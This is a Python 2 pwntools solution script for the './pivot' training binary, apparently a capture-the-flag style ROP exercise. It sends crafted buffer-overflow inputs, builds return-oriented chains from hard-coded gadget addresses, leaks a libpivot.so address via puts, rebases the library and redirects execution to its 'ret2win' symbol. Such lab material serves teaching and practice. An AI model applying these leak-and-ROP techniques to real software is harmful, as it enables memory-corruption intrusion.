#!/usr/bin/python
#coding=utf-8
"""Walk-through script for the ``./pivot`` training binary.

The script drives the local process ``./pivot`` over its ``> `` prompt in three
rounds: the first two rounds send crafted inputs that make the program print an
address from ``./libpivot.so``, the leaked address is used to rebase the
library, and the third round sends an input that reaches its ``ret2win``
symbol and prints what the process replies.

Every address below is a hard-coded literal for one specific build of the
binary; rebuilding or relinking the target invalidates all of them.  The
``print`` statement at the bottom and the ``str``-based ``ljust`` padding
show this is Python 2 / the Python 2 era of pwntools.
"""
from pwn import *
# Spawn the target as a local child process and load the shared library so
# its symbol offsets can be looked up below (used by libc.symbols[...]).
p = process("./pivot")
libc = ELF("./libpivot.so")
# Fixed addresses inside the non-relocated main binary.  The names are the
# author's; presumably pop_rdi is a "pop rdi; ret" gadget and puts_plt /
# foothold_plt are PLT stubs -- verify against a disassembly of this build.
pop_rdi=0x400b73
puts_plt =0x400800
foothold_got=0x602048
foothold_plt=0x400850
main_addr=0x400996
# 32 bytes of filler (four 8-byte groups); the fifth group is commented out.
paying='a'*8+'b'*8+'c'*8+'d'*8#+'e'*8
# Round 1 input: filler, then main_addr, foothold_plt, main_addr.
payload=paying+ p64(main_addr)+p64(foothold_plt)+p64(main_addr)#gadget_1
# Why put main at the saved-rbp position?  That address happens to land at
# the very end of gadget_2 (see the round-2 comment below).
p.sendlineafter("> ",' ')
p.sendlineafter("> ",payload)
# Round 2 input: filler, a zero qword, then pop_rdi / foothold_got / puts_plt.
payload=paying+ p64(0)+p64(pop_rdi)+p64(foothold_got)+p64(puts_plt)#gadget_2
# No return address is appended here because there is not enough room; the
# value left in the rbp slot by gadget_1 is not overwritten this round and
# serves that purpose.
p.sendlineafter("> ",' ')
p.sendlineafter("> ",payload)
# The process prints a 6-byte address; pad to 8 bytes and unpack it as a
# little-endian u64.  Note: p.recv(6) assumes exactly those 6 bytes arrive
# first -- any banner text before them would corrupt the leak.
addr=u64(p.recv(6).ljust(8,"\x00"))
# Rebase the library: leaked runtime address minus the symbol's file offset
# gives the library's load base, after which every symbol is resolvable.
libc.address=addr-libc.symbols["foothold_function"]
ret2win=libc.symbols["ret2win"]
# Round 3 input: filler, a zero qword, then the resolved ret2win address.
payload=paying+ p64(0)+p64(ret2win)
p.recvuntil('> ')
p.sendlineafter("> ",payload)
# Python 2 print statement: echo the process's final reply between markers.
print '+++\n '+p.recvline()+'+++'